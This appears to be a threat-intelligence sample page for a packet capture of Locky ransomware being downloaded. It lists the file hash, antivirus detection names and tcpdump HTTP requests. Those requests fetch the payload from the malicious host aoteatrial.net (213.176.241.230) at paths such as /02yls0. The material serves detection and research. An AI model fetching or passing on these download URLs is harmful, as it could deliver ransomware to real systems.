Locky Ransomware Malware aoteatrial.net/02yls0 PCAP file download traffic sample

Download Attachments

  • 1 pcap locky (17 KB)
    Date added: October 29, 2016 8:00 am. Added by: admin. Downloads: 308
SHA256: 9081ecf001a89fb1fa6f2855c6385d43fd473d69de0e58ed9b9e7e23ac954aff
File name: 02yls0
Detection ratio: 33 / 56
Analysis date: 2016-10-29 07:47:22 UTC

Engine / Result / Signature update
Arcabit Trojan.Agent.CAHB 20161029
Avast Win32:Malware-gen 20161029
Avira (no cloud) TR/Crypt.ZPACK.elnee 20161028
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9942 20161029
BitDefender Trojan.Agent.CAHB 20161029
Bkav HW32.Packed.AE7D 20161029
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20161024
Cyren W32/Locky.BC.gen!Eldorado 20161029
ESET-NOD32 a variant of Win32/Kryptik.FIQB 20161029
Emsisoft Trojan.Agent.CAHB (B) 20161029
F-Prot W32/Locky.BC.gen!Eldorado 20161029
F-Secure Trojan.Agent.CAHB 20161029
Fortinet W32/Generic.FIQB!tr 20161029
GData Trojan.Agent.CAHB 20161029
Invincea ransom.win32.locky.a 20161018
K7AntiVirus Trojan ( 004fbad41 ) 20161029
K7GW Trojan ( 004fbad41 ) 20161029
Kaspersky HEUR:Trojan.Win32.Generic 20161029
Malwarebytes Ransom.Locky 20161029

2016-10-29 02:50:44.243416 IP 192.168.1.102.64953 > 213.176.241.230.80: Flags [P.], seq 0:283, ack 1, win 256, length 283: HTTP: GET /02yls0 HTTP/1.1
GET /02yls0 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: aoteatrial.net
Connection: Keep-Alive
2016-10-29 02:50:45.116064 IP 192.168.1.102.64953 > 213.176.241.230.80: Flags [.], ack 2921, win 256, length 0
2016-10-29 02:50:52.686092 IP 192.168.1.102.64954 > 104.112.255.83.80: Flags [P.], seq 0:262, ack 1, win 256, length 262: HTTP: GET /fwlink/?LinkId=57426&Mime=application/x-msdownload HTTP/1.1
GET /fwlink/?LinkId=57426&Mime=application/x-msdownload HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: go.microsoft.com
Connection: Keep-Alive
2016-10-29 02:50:52.765557 IP 192.168.1.102.64953 > 213.176.241.230.80: Flags [.], ack 247008, win 252, length 0
2016-10-29 02:50:57.973364 IP 192.168.1.102.64957 > 213.176.241.230.80: Flags [P.], seq 0:392, ack 1, win 256, length 392: HTTP: GET /02yls0 HTTP/1.1
GET /02yls0 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Range: bytes=245702-
Unless-Modified-Since: Fri, 28 Oct 2016 07:32:48 GMT
If-Range: "3c400-53fe7dd719b7b"
Host: aoteatrial.net
Connection: Keep-Alive
2016-10-29 02:51:33.922947 IP 192.168.1.102.64957 > 213.176.241.230.80: Flags [P.], seq 392:675, ack 1360, win 251, length 283: HTTP: GET /142y5x HTTP/1.1
GET /142y5x HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: aoteatrial.net
Connection: Keep-Alive